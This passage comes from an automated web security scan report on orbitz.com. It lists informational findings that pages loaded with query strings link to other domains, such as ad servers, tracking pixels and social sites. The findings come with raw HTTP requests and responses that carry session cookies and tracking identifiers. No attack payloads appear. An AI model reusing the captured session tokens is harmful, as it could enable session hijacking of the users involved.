http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=229900&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions-b&cnt=PRO&type=cs_qs

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E894D0E87D40EFBE1B808EFE6EAA0B1A; Path=/
Content-Type: text/html
Cteonnt-Length: 1028
Date: Wed, 02 Feb 2011 16:05:39 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 1028

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=229900&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions-b%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.376. http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/air/max_passenger_popup.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp?popupsDisabled=true

The response contains the following link to another domain:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=A599324D1A99DFF87A6A633D25322E7F; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:04:49 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 5060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: TODO
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.377. http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp?plusThree=true&botId=aph

The response contains the following link to another domain:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=A102EF34DBF26087ED0E8433788F9228; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:04:49 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 2978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: T
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.378. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/legal/lowFarePromise.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp?popupsDisabled=true

The response contains the following link to another domain:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=86AEB0323B18FBAB0DADEB251B027ED7; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:04:52 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 11984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: TODO
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.379. http://www.orbitz.com/shop/hotelsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shop/hotelsearch?models%5B'hotelSearchView'%5D.location=35368&_models%5B'hotelSearchView'%5D.ratingForHotelPath=0&models%5B'hotelSearchView'%5D.minRevRating=1.0&models%5B'hotelSearchView'%5D.maxRevRating=5.0&_models%5B'hotelSearchView'%5D.amenities=0&_models%5B'hotelSearchView'%5D.hotelChains=0&models%5B'hotelSearchView'%5D.page=1&search=Change&hotel.couponCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.locationAddressInput.addressInput.countryCode=US&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelChain=&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationKeywordInput.key=Boston%2C%20MA%2C%20United%20States&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.locationAddressInput.addressInput.city=&type=hotel&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelName=&hotel.hotelRating=&hotel.typeOfSearch=keyword&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.locationAddressInput.addressInput.stateProvinceCode=&rep=partial

The response contains the following links to other domains:

http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/process/remove/extraSmall/extraSmall-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png

Request

GET /shop/hotelsearch?models%5B'hotelSearchView'%5D.location=35368&_models%5B'hotelSearchView'%5D.ratingForHotelPath=0&models%5B'hotelSearchView'%5D.minRevRating=1.0&models%5B'hotelSearchView'%5D.maxRevRating=5.0&_models%5B'hotelSearchView'%5D.amenities=0&_models%5B'hotelSearchView'%5D.hotelChains=0&models%5B'hotelSearchView'%5D.page=1&search=Change&hotel.couponCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.locationAddressInput.addressInput.countryCode=US&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelChain=&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationKeywordInput.key=Boston%2C%20MA%2C%20United%20States&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.locationAddressInput.addressInput.city=&type=hotel&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelName=&hotel.hotelRating=&hotel.typeOfSearch=keyword&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.locationAddressInput.addressInput.stateProvinceCode=&rep=partial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C11231%7C+%7C%26%26HE; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____11231_2_1_1_1%7D; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573898685:ss=1296573790782

Response

17.380. http://www.orbitz.com/shop/hotelsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x600&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x600&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x600&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x600&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
